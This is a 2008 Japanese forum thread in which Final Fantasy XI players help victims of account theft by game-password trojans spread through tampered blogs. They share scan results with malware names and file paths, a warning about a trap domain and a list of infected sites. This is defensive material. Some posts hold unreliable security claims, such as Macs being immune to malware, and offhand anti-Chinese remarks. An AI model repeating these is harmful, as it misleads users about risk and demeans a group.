E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
http://www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか ?
88 :
80 :2008/03/24(月) 07:30:20.21 ID:QCo+vR7/
>>84 私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。
間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)
>>87 >>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。
>>88 FC2IDはメールアドレスだったと思う。
管理画面の「ようこそ○○さん」とは関係ない。
91 :
既にその名前は使われています :2008/03/24(月) 07:54:00.87 ID:MKZHUFJz
>>88 詳しく書かないがブログIDとログインIDは別物。
知らないってことはブラウザにIDとパス記憶させてる?危険だよそれ。
ハックされたブログもクッキー使ってたか知りたいな。
>>89 わかりました、探してまずは圧縮してみます<(_ _)>
93 :
80 :2008/03/24(月) 08:06:40.96 ID:QCo+vR7/
>>90 >>91 確認してきましたが、ログインIDは記憶させていました。
そのせいだったんですねorz
>>84 さん、失礼致しました。
94 :
既にその名前は使われています :2008/03/24(月) 08:08:45.04 ID:rCHR+RwE
あと気になったファイルがあったので載せておきますね。 オンラインスキャンの結果をメールで報告するトコがありますよね? 出てきたファイルが↓です。 kavonline0.vir kavonline1.vir kavonline2.vir kavonline3.vir kavonline4.vir kavonline5.vir kavonline6.vir どこにあったのかまではわかりませんでした。
95 :
既にその名前は使われています :2008/03/24(月) 08:09:36.93 ID:wiMjf6Lx
Mac用のPG2みたいなソフトないですか…
96 :
既にその名前は使われています :2008/03/24(月) 08:15:42.99 ID:vc86vULj
>>88 の言いたい事が何となく分かる。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
ttp://ブログID.blog ××.fc2.com/
こんな感じに。
で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。
…見当違いの事言ってたら済みません。
98 :
既にその名前は使われています :2008/03/24(月) 08:40:55.56 ID:h9kMfdX+
>>91 FC2ブログは使ってないので知らないけど、普通はIDとパス記憶させるのは
オートコンプリートの方じゃないかな
99 :
既にその名前は使われています :2008/03/24(月) 08:42:27.44 ID:Q/ktx4QO
>>85 おつかれさん。仮眠して少しは落ち着いたかな?
まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。
次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。
それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。
そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。
100 :
98 :2008/03/24(月) 08:43:24.33 ID:h9kMfdX+
普通はIDとパス記憶させるのは (クッキーじゃなくて)オートコンプリートの方じゃないかな ってことね オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ
おはようございます<(_ _)>
>>99 上から順番に読んできましたが前スレの
>>168 の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz
サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。
良く行くサイトはYouTubeとニコニコです。
その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。
検知しました: ウイルス Net-Worm.Win32.Allaple.a ファイル: D:\etc\Rep\2007年\9月\FFXI 2007年09月27日18:43.htm これやばい?
これやばいこれやばい聞く前にウィルス名でぐぐって見ろと
ググったけど件数少なすぎてわからないんです・・・ 誤検知なのかな?
つーかヤバくないって言われたらどうすんだよw 飼ったままにしとくのか?
誤検知なんだったら処理しない?を選ぼうかと・・
>>99 忘れてましたorz夜はありがとうございました<(_ _)>
いまは大分落ち着いています。ホント頭が真っ白になりました。
2ちゃんねるのみなさんには色々お手数をかけてしまって、本当にありがとうございます!
今、体験版をダウンロードしてインストールしてます。
追加報告ですが、公式サイトのPOL会員情報にはログインできるようになりました。
ゲームのほうは試してませんが、ログインはちょっと様子を見たほうが良いですか?
109 :
既にその名前は使われています :2008/03/24(月) 09:07:23.92 ID:HWQPHJQs
おっと途中で送信 Allaple.aでぐぐって15300件も出てきました どうやってぐぐったんだ?w
110 :
既にその名前は使われています :2008/03/24(月) 09:13:32.82 ID:Q/ktx4QO
net-Worm.Win32.Allaple.a でぐぐってました
危険といわれているブログには行った覚えがないものの 一連の騒ぎで不安になり、一応カスペルスキーでスキャンしてみたらこんなのが出てきました。 C:\Documents and Settings\Application Data\Symantec\Norton AntiVirus\Quarantine\294E6D1E.jpg 感染: Trojan.VBS.IFrame しかしノートンでスキャンしてもなんの反応もないし、そもそもノートンのプログラムの一部に思えるのですが これはなんらかの対策をしたほうがいいんでしょうか?
113 :
80 :2008/03/24(月) 09:15:15.72 ID:QCo+vR7/
まさに
>>96 さんの言うようにログインしていました。
キャッシュやオートコンプリートなど全て削除してみましたが
ここからならブログIDでログインできてしまうんですね。
うちはマイナーブログですがこのままFC2を使い続けるのは不安が残ります…。
やはりブログは閉鎖して、しばらく様子を見ようと思います。
114 :
既にその名前は使われています :2008/03/24(月) 09:15:35.01 ID:QuC4Hos4
115 :
既にその名前は使われています :2008/03/24(月) 09:20:08.13 ID:rpE40Jdl
116 :
既にその名前は使われています :2008/03/24(月) 09:23:57.04 ID:lzZx8A86
>>102 ファイル名だけ見る限りは、誤検知かもしれないけど、
駆除しておいたほうがいいんじゃない?
117 :
既にその名前は使われています :2008/03/24(月) 09:27:13.76 ID:Q/ktx4QO
>>107 「公式サイト」が何を意味するか分からないが、
PlayOnLineにログインできたってことかな?
で、PlayOnLineにログインできたのなら、
ログインできた日時とID/pwをメモしておいて。
まずは、PCの面倒よりも自分のアカウントの状況を
□eに認識してもらうのを最優先しすべく、
>>7-9 の準備しておこう。
繰り返すが、PCは常時接続にせず、必要最小限のときに接続すること。
PCを落としておくということでもかまわん。
>>115 わかりました。しばらく様子を見てみます<(_ _)>ありがとうございます!
サイトのほうも見て来ました。簡単なようですので入れられるようなら入れてみます。
関係ないですが、このカスペルキーの検知した時の音が怖いですorz
119 :
既にその名前は使われています :2008/03/24(月) 09:30:24.35 ID:HZjEcLif
いやちょっと待て 垢ハックされて昨日の夜はログインできなくて今日出来るっておかしくね? サポセンまだ開いてないぞ ただのパスワード入力ミスじゃ…
>>117 FF11の公式サイトにある、POL会員サポートのところにログインできました。
今からもう一度行ってみて、回線を切っておきます<(_ _)>
ありがとうございます!
121 :
既にその名前は使われています :2008/03/24(月) 09:33:59.95 ID:Q/ktx4QO
122 :
既にその名前は使われています :2008/03/24(月) 09:35:56.39 ID:lzZx8A86
>>119 それか、業者がパスを元に戻したとかかね
これが落ち着くまでの最後の書き込みです。
>>119 会員情報で自分が操作した履歴を見れるんですが
機能私が変更したのは一回だけですが↓のような結果が…orz
サービス利用履歴の確認 > プレイオンライン
年月日 サービス名 アクション
2008/03/24 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/23 プレイオンライン
POLパスワード 変更
2008/03/03 プレイオンライン
POLパスワード 変更
124 :
既にその名前は使われています :2008/03/24(月) 09:37:09.52 ID:rpE40Jdl
ううん、何でPOL入れたのかな。バハスレで新しいレジコメールに送ったってあったから、それ使ったのかな? プレイ中に落とされたって書いてたから、パスワード入力ミスって事はないんじゃないかな
125 :
既にその名前は使われています :2008/03/24(月) 09:37:42.70 ID:rpE40Jdl
ごめん、かぶったorz
>>119 ログインしてる最中に後から同じIDでログインされると先にログインしてる方は落とされるんだよ。
ID、パスの間違いじゃない。
その後、ログイン合戦があってパス変更されてしまい、ログイン出来なくなったらしい。
127 :
既にその名前は使われています :2008/03/24(月) 09:39:27.24 ID:Q/ktx4QO
>>119 それなら、ヴァナのことは放って、PCの始末に専念できるってことさ。
今は、アカウントの保持だよ。
感染してる=ハックされてると仮定してたが、PCが感染により重くて
POLとの通信が切れたこともあり得るね。
>>120 >>119 の可能性もあるので、前回落とされた時間とさっきログインできた時間を
サポセンに連絡して、その間のログインがあったかの調査を頼んでおきなはれ。
128 :
既にその名前は使われています :2008/03/24(月) 09:40:01.67 ID:CHzqP0my
129 :
既にその名前は使われています :2008/03/24(月) 09:42:22.93 ID:wiMjf6Lx
130 :
既にその名前は使われています :2008/03/24(月) 09:43:46.33 ID:rpE40Jdl
なんでこんなに書き換えられて?本人が書き換えたのが今日ではまだないですよね? 業者側が何度もかえてたんだろうけど・・・どうしてだろう?
131 :
既にその名前は使われています :2008/03/24(月) 09:46:36.60 ID:Q/ktx4QO
>>123 よく気が回ったね。いい情報拾った。
2回目以降の状況がどう見ても異常だというのが読み取れる。
それぞれのパスワード変更のときの接続元IPが違うだろうから、
それも申し入れておくといい。
で、業者側が痕跡を残さないように元に戻したとも考えられるか。
# アイテムがなくなってるか、変なところにいるはずなのでバレバレだがね。
ま、この辺は業者しか分からない訳なので、こういう例があると記憶しておこうや。
>>126 その説明じゃまだイマイチ分らないんだけど、パスを変更されても変更する前の元のパスで
POLにログインできるってこと?
それはそれでPOLのセキュリティに問題ない?
あぁ、ごめん勘違いしてた(´・ω・`)
134 :
既にその名前は使われています :2008/03/24(月) 10:10:57.98 ID:Q/ktx4QO
>>123 3時過ぎに鯖板に晒してたメアドに昨日のIDをタイトルにしたメールしてあるからなっと。
こんなスレあったんですね。 少し前にPCが重いので、@niftyの無料ウィルスチェックしたら Trojanなんたら、種別:トロイの木馬 というのが検出できました。 ウィルスの駆除ボタンを押しても駆除失敗と出るだけなので、 強引にそのファイルごと全消去しました…。 POLは電話してパスワード変更してもらって(←今までのパスワード忘れてしまってた)、 その後何度かウィルスチェック(@niftyのとこですが…)をかけてますが 検出されてません。 でもここ見ると、カスペルスキイというのでしか検出できないみたいですね。 ウィルスが消えてるのか、それとも単に検出できないだけなのか…
136 :
既にその名前は使われています :2008/03/24(月) 10:25:49.35 ID:xXZ5UG8T
137 :
既にその名前は使われています :2008/03/24(月) 10:48:24.12 ID:Q/ktx4QO
138 :
既にその名前は使われています :2008/03/24(月) 10:48:34.53 ID:0fYn7lrn
ログインできたのならとりあえずアイテムなくなってるかだけでも確認したほうがいいんじゃない?
139 :
既にその名前は使われています :2008/03/24(月) 10:49:25.93 ID:Yz0CGQZ+
パスワード変更したならログインしないほうがいい
140 :
既にその名前は使われています :2008/03/24(月) 10:58:16.75 ID:cxfdIhE2
>>112 それノートンがすでに隔離したファイルだと思うが
ノートンの使い方の中で隔離ファイルの削除を探すんだ
>>114 上のレスってどれ?
同様の質問がfc2ブログを見に行ったらスレにあったがそっちのこと?
142 :
既にその名前は使われています :2008/03/24(月) 11:08:29.60 ID:586YcECP
>>878 感染もなにも、「Ace Password Sniffer」はオンライン販売されているソフト
フリーのパケットキャプチャソフトにパスワード抜き出しツールを被せたもの
シマンテックはこれを「好ましからざるソフト」に分類した
カスペルスキーがWinnyやShareを「好ましからざるソフト」扱いするのと同じ
みんなが説明してくれているように、リピータハブを使っていてかつ業者と
同居していなければPS2やXBOXがやり取りするデータがPCに流れることはないよ
たとえ流れても、専用の解読ツールでも作らない限りパスは抜けない
前スレの886からするとPS2なら安全ということなの?
ハブみてみたらリピーターだったんだが家には業者らしき人間はいない。
>>36 ブログ主が小遣い稼ぎで中華広告を埋めたという線もあるからな
144 :
まとめ”管理”人 ◆mj63/8nmCU :2008/03/24(月) 11:14:25.55 ID:6zivGh2w
過去ログの方のまとめ管理人です。コテワード忘れてしまったので変わります。すみません本人です。
今現在の過去ログは950〜以降が取りきれてないものが若干ありますがup完了しています。
>>79 さんありがとうございます。ログ補完できました。
被害抜粋も再開していきますのでお待ち下さい。
あとサイトにも書きましたがinfoseekのメルアドが送受信不具合を起こしています。(知人からのメールで発覚)
今現在届いてるメールには返信は終わってますが返事がない方は
matome★ort.sakura.ne.jp
(ほしを@にかえてください)
お手数ですがこちらに再送よろしくおねがいします。
145 :
ログまとめ ◆mj63/8nmCU :2008/03/24(月) 11:29:52.41 ID:6zivGh2w
うわ・・・名前に管理と入れると自動に””が付くんですね。 他の管理の方と紛らわしいので変えました。スレ汚しすみません
146 :
既にその名前は使われています :2008/03/24(月) 11:46:43.59 ID:E6d3p/DA
Lirisです。先ほどサポートセンターへ連絡してきました。 ログインの履歴から、私が寝た後にログインされていて、不正アクセスの可能性が高いという事です。 一度、サポートセンターからもらったパスワードでPOLとFF11へログインしキャラクターの状態を確認。 なくなってるアイテムもなく、お金もそのままでした。 おそらく私が書き込んだあとにGMを呼んで下さった方々のおかげだと思います。 倉庫の方も無事を確認しました。キャラクターの移動もなく、ホントそのままの状態です。 ログアウトしたあと、また新しいパスワードをもらいましたので、 パソコンの方が綺麗になってからログインしようかと思います。 サポートセンターの方からウィルスの情報がありましたら教えてください、という事で ・重要な領域 E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj を報告して来ました。
147 :
既にその名前は使われています :2008/03/24(月) 11:48:27.80 ID:E6d3p/DA
実際に被害(キャラ・アイテム等)にないと言うことですが、 不正にアクセスされたという結果は犯罪なので、 警察の生活安全課に、ご自身の判断で通報・被害届けを出してください、とのことです。 ここでたくさんの応援と助言をありがとうございました<(_ _)> たぶん、みなさんがいなければ泣き寝入りしていたかもしれません。 私のような結果は、もしかすると稀なのかもしれませんが、 キャラクターがいなくなったり、アイテムがなくなったりする人が実際にいるんですよね… こういう被害者が出ないように祈っています。 私だけではどうしようも出来なかった事だと思っていますので感謝しきれません。 本当にありがとうございました!<(_ _)>
148 :
既にその名前は使われています :2008/03/24(月) 11:55:41.59 ID:lsU5BPJR
>>146 被害が無くて本当に良かった。
でもハックしてログインしておきながらギルに手をつけないってなんなんだろう?
あえて取るほどでもない金額とかだと被害に合わないのかな?
参考までに所持金額が知りたいです。失礼な質問でごめん(´・ω・`)
>>148 所持金ですか…orz
恥ずかしいですが、メインで4万ギルちょっとです(;´д⊂)
倉庫には忍術の束しか入れてませんでした。
そこまでやられてると、必要なユーザーデータをバックアップ後 初期化ー>パッチ適応ー>再インストールしたほうがいいかも ブックマークとか忘れがちだけどね 年賀状ソフトのデータとかも忘れて入れなおしたなぁ〜今年
>>149 キャラだけチェックして、優先順位的に下位のほうにされたということかなぁ。
何はともあれお疲れさんでした。
152 :
既にその名前は使われています :2008/03/24(月) 12:09:42.70 ID:xXZ5UG8T
>>146 乙です
今後の人のためにその検出したアンチウィルスソフトも報告されたほうがいいですよね。
ブツは同じでもアンチウィルスソフトのメーカーによって名前が変わる事も稀によくあることですし。
153 :
既にその名前は使われています :2008/03/24(月) 12:12:04.46 ID:lsU5BPJR
確かにこれだけパス抜かれてる人が多いと、
業者も売り捌きやらなんやらで忙しいんだろうな…。
>>149 4万かー。参考になったよ。ありがとう(`・ω・´)
154 :
既にその名前は使われています :2008/03/24(月) 12:17:08.53 ID:2iutMXe5
素人なもんで教えてください ブログが危ないのはわかったが、ELEMENとかは大丈夫なんだろか (o・v・o)?
155 :
既にその名前は使われています :2008/03/24(月) 12:17:20.29 ID:E6d3p/DA
>>151 そうなのかもしれませんね…
あとは素早くたくさんの人が対処してくださった結果のだと思います。
>>152 カスペルスキー オンラインスキャナ レポート
2008年3月24日 1:20:33
OS: Microsoft Windows XP Home Edition, Service Pack 2 (Build 2600)
カスペルスキー オンラインスキャナ バージョン: 5.0.98.0
データベースの最終アップデート: 23/03/2008
データベースのレコード: 655233
↑これがスキャンした時のです。
今は体験版で削除をしてますが、
>>150 さんの助言どおり終わったら再インストールするつもりです。
やっと安心できますorzホント気が気じゃなかったです。
みなさんのレスがなかったら一人で悶々としてるしかなかったですよ…
何かありましたらまた報告しますね。
お礼ばっかり言ってる気がしますが、言わせてください<(_ _)>
色々とありがとうございました!
156 :
既にその名前は使われています :2008/03/24(月) 12:21:35.09 ID:5JqdShUs
157 :
既にその名前は使われています :2008/03/24(月) 12:29:12.48 ID:KjMFND3D
>>146 おつかれさまでした。キャラ無事でなによりです。
少しGMの対応かわった?前の報告だとウィルス名とか聞いてたっけ?
158 :
既にその名前は使われています :2008/03/24(月) 12:34:14.42 ID:DC8kpJkf
新たに福建中華の罠ドメインが登録されていたので気をつけてくれよな! ブログ改竄騒ぎよろしく早ければすでに使われているはず。 Domain name: gamelaone■com longyan Fujian 364000 Created: 2008-03-22
ガメレオン涙目じゃね?
フォルダ構成理解してない奴ばっかだな こんなバカだらけだと垢ハックは減らないわ
パッケ買ってせこせこと複数PC上でツール使いながら活動するよか楽に金が稼げる 手段としてやってるんだろね。
>>146 じゃないけど、二、三日前にハックにあって何も被害無し。対応の仕方も同じ。ウィルスが原因。
俺の場合、inしてる時に他からログインされて、相手とログイン合戦になった結果パス変えられてって感じ。
手持ちの他垢からGMに伝えたけど電話じゃなきゃ無理だった。
知らない誰かと自キャラでログイン合戦してる恐怖感はトラウマだわ。 長文チラ裏スマソ
163 :
既にその名前は使われています :2008/03/24(月) 12:42:30.25 ID:cSZUGl4j
単発で急に切れる奴何なの?w
164 :
既にその名前は使われています :2008/03/24(月) 12:42:51.55 ID:sV5MTkg6
とにかく■は公式の目立つところに垢ハクの注意勧告を載せるべきだな。 ネ実で対策が進んでるのに、まったくあきれるほど保身を優先する会社だぜ。 問題を認めると、問い合わせやら責任問題やらの対応に手がかかると思ってんだろうな。 ■が無視してるそのあいだにも被害は拡大しているというのに。
ところで、オートログインのネットゲームって一般的な存在なんだろうか?
166 :
既にその名前は使われています :2008/03/24(月) 12:46:49.68 ID:xXZ5UG8T
>>155 俺らにもだけど、そのサポートセンターさんにということでした。
紛らわしくてソマン
167 :
既にその名前は使われています :2008/03/24(月) 12:53:18.90 ID:O+2gK/uP
ペコログ踏んじまった。 avastとSpybot無反応だ。。 カスペ落としてスキャンせねば><
168 :
既にその名前は使われています :2008/03/24(月) 12:58:43.37 ID:Q/ktx4QO
>>146 ヴァナ無事確認おめでとう! 本当によかった。
>>149 いわゆる高額保有者ではなく、異次元価格品もなかったので、
業者も困ったってとこかw
君はわしか?w
で、
>>150 のいうとおりだと思う。
何かしら住んでる可能性あるし、バックドア1度開けられて、IP拾われてるだろうから
業者さんからアタック掛けられる可能性も残る。
ので、ウィルス対策単体ではなく、一式面倒を見てくれるソフトを入れておくのを
お勧めする。
鍵は多重に掛けるでしょ?
>>156 最近は、MicrosoftUpdateがよいよ〜。
MS-Officeのも引っかけてくれるから。
170 :
既にその名前は使われています :2008/03/24(月) 13:05:26.80 ID:O+2gK/uP
>>169 もう大丈夫なのかな><
カスペの無料体験ルーレットが90日引けなくてリトライ祭してたところ。。
>>170 前スレで警告されてたけど、
ぺころぐにトロイがあるってこちらが聞いたのは
金曜日の話なんだよね。
FC2ブログは今回の話見てから一切開いてないけど
金曜日から見てる人は注意したほうが良いかもしれない。
今も治ってるかどうかもわからないし。
また情報が入ったら書き込みします。
172 :
既にその名前は使われています :2008/03/24(月) 13:11:05.57 ID:13N6BdxD
スクエニはいつまで静観してるつもりだろうな… 被害が一気に増えたりでもしら悪い意味で有名になるだろうに…
つうかマンガ喫茶とかつかうほうがアホなんだろ 自宅だけにして、LSコミュニティも利用しないほうがいい
175 :
既にその名前は使われています :2008/03/24(月) 13:23:13.70 ID:Q/ktx4QO
177 :
既にその名前は使われています :2008/03/24(月) 13:51:50.72 ID:47bjLYLG
ペコろぐソース見てきたけど、自分で見た限りでは変なスクリプトはなかった感じ。 3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。 まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは 気をつけないとだねぇ。
ペコろぐ。 (罠撤去済み) ヴァナモンblog (罠撤去済み) FF11初心者の館 (ウイルス散布中)
もうFC2はソースチェッカーでチェックしてからじゃないと 怖くて踏めないな...
181 :
既にその名前は使われています :2008/03/24(月) 14:31:36.43 ID:vTR+hCx8
注意age
182 :
既にその名前は使われています :2008/03/24(月) 14:34:20.69 ID:Httpif6H
ぶっちゃけFC2側としてはたいして被害あるわけじゃないから 必死こく必要ないんだよなぁ
183 :
既にその名前は使われています :2008/03/24(月) 14:45:51.90 ID:Ny3ZGjXA
とりあえず俺もHDD24時間稼働で1年経つし寿命ついでにOS再インスコしよう そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……
184 :
既にその名前は使われています :2008/03/24(月) 14:47:10.45 ID:WdMLKCJz
ほんっとにロクなもん混入しねえなあいつらwww
185 :
既にその名前は使われています :2008/03/24(月) 14:53:21.20 ID:sI0/2XTk
「中国 混入」でググったら 予想を遥かに超えていた
186 :
既にその名前は使われています :2008/03/24(月) 14:56:30.58 ID:Httpif6H
俺のIDもウィルススキャンしてくだしあ;
187 :
既にその名前は使われています :2008/03/24(月) 15:02:06.20 ID:sV5MTkg6
俺の肛門もハックされそうだ!
188 :
既にその名前は使われています :2008/03/24(月) 15:02:26.35 ID:sI0/2XTk
189 :
既にその名前は使われています :2008/03/24(月) 15:03:52.97 ID:8jcNID1A
しかし10年前とかは輸出食品が劣悪ということはなかったんだよな 人増えすぎるとよくないな
191 :
既にその名前は使われています :2008/03/24(月) 15:31:47.67 ID:+jpHHFib
>>95 そもそもMacはウイルスやマルウェアに
事実上感染しないんだから必要ないんだが。
192 :
既にその名前は使われています :2008/03/24(月) 15:38:27.74 ID:+jpHHFib
>>148 おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。
ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。
>>191 数年前にやってたMacのTVCM思い出したよ。
「Macはウィルスに感染しないんだ!」って奴。
相手にされてないだけだろ、とテレビに向かって突っ込んだ記憶があるw
194 :
既にその名前は使われています :2008/03/24(月) 15:41:14.29 ID:+jpHHFib
>>162 おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。
195 :
既にその名前は使われています :2008/03/24(月) 15:42:23.89 ID:Q/ktx4QO
196 :
既にその名前は使われています :2008/03/24(月) 15:44:19.68 ID:+jpHHFib
>>193 理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。
日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。
197 :
既にその名前は使われています :2008/03/24(月) 15:45:03.69 ID:Q/ktx4QO
>>194 >入浴して
マウスだかコントローラだかを行水させちゃまずいだろw
烏の行水ならぬ鼠の行水・・・ 【サンダー】【ショック】【気をつけてください。】
>>196 わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?
>>199 煽ってるの判ってるならスルーしれ。
いつも沸いてる既知外だろ。
201 :
既にその名前は使われています :2008/03/24(月) 16:00:56.88 ID:+jpHHFib
>>199 そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。
なんつうか、防衛対策まともにとれないなら PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい
専ブラでID抽出するとテラワロスw
パス変更した時に、盗まれるってのは、ある?
205 :
既にその名前は使われています :2008/03/24(月) 16:18:28.67 ID:TvxgTMvM
>>204 すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに
>>194 の方法で変更するのが吉。
キーロガー型が現状少ないのはそのとおり。 余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで 先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた (のでBOTNEWSなどでは「いまさら…」感があった)。
208 :
既にその名前は使われています :2008/03/24(月) 17:09:06.90 ID:C2NTmBz4
夕べからこのスレ参考にして自分のPCにNoScriptとPeerGuardian導入 したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に ならなくなってビビッタ。 どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が 起こるなんて事ってある? 一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に できて、今Avastでスキャン中。
原理的には可能だけど、まずないと思う。
210 :
既にその名前は使われています :2008/03/24(月) 17:22:32.78 ID:Q/ktx4QO
211 :
既にその名前は使われています :2008/03/24(月) 17:26:57.16 ID:C2NTmBz4
212 :
既にその名前は使われています :2008/03/24(月) 17:34:35.33 ID:zErWARNN
UchinoLSの準はいじんwが 「垢ハック?あり得ねぇwww」 「される奴って馬鹿?w」 「FF専用PC用意すればいいのに馬鹿じゃねwww」 とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。 LS掲示板で騒いでた。
FF専用PC用意してなかったんだね(´・ω・`)
>>212 自業自得だな
タル暗と同じレベルではずかしい
215 :
既にその名前は使われています :2008/03/24(月) 17:42:19.74 ID:T6Wahbt1
垢ハックされたかもwwww
216 :
既にその名前は使われています :2008/03/24(月) 17:46:25.63 ID:KodraVfX
垢ファックされた><
PG2インスコしたらFFも弾くんだなワロタ
218 :
既にその名前は使われています :2008/03/24(月) 18:00:45.95 ID:Fm9VlWLZ
パスをスクリーンキーボードで入力したいんだけど PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)
アクセサリのユーザー補助。 アプリの追加で入れないと無いかも。
221 :
既にその名前は使われています :2008/03/24(月) 18:10:44.01 ID:Fm9VlWLZ
そうなのか! ありがとう入れてくるは
>>220 接続すらできなくなるよ
初心者の俺にはPS2がお似合いなのかw
先日ハックされました、ノートン最新状態で無反応。 FF立ち上げたらインストールディスクを入れろと指示されFF開始できない CDもってきたら普通に起動、しかしIDやパスを再入力する状態 そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・ GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話 やっとGM来てキャラを即停止してもらい本人確認後キャラ返還 ギルや高額アイテムは一切無しの状態でした ウイルスソフトで再サーチ+FFをインスコ だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断 HDを初期化し終結・・・・・・ GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、 ということは何も戻ってこないということじゃんwwwwwww 不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・ GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!
>>222 前スレで詳しくわかんないならP2Pを許可するにしる
とか見たきがする
225 :
既にその名前は使われています :2008/03/24(月) 18:29:27.04 ID:8bfKIyLi
いい加減、公式のトップページで注意喚起を促す文章載せろよクソエニ
>>223 ネットカフェは利用してないだろうな?
してたら間違いなくそこだ
>>222 PG2 FFXI でぐぐれば幸せになれる
228 :
既にその名前は使われています :2008/03/24(月) 18:31:35.14 ID:f8U+hHlG
インしたら数行垂れ流すだけでも随分違うのにな
もう誰かが、シャウトで、伝えるて問題を大きくするしかないな
>>226 オチケツ、ネットカフェ使っても自宅PCのFFがCD入れろなんて言わないだろう。
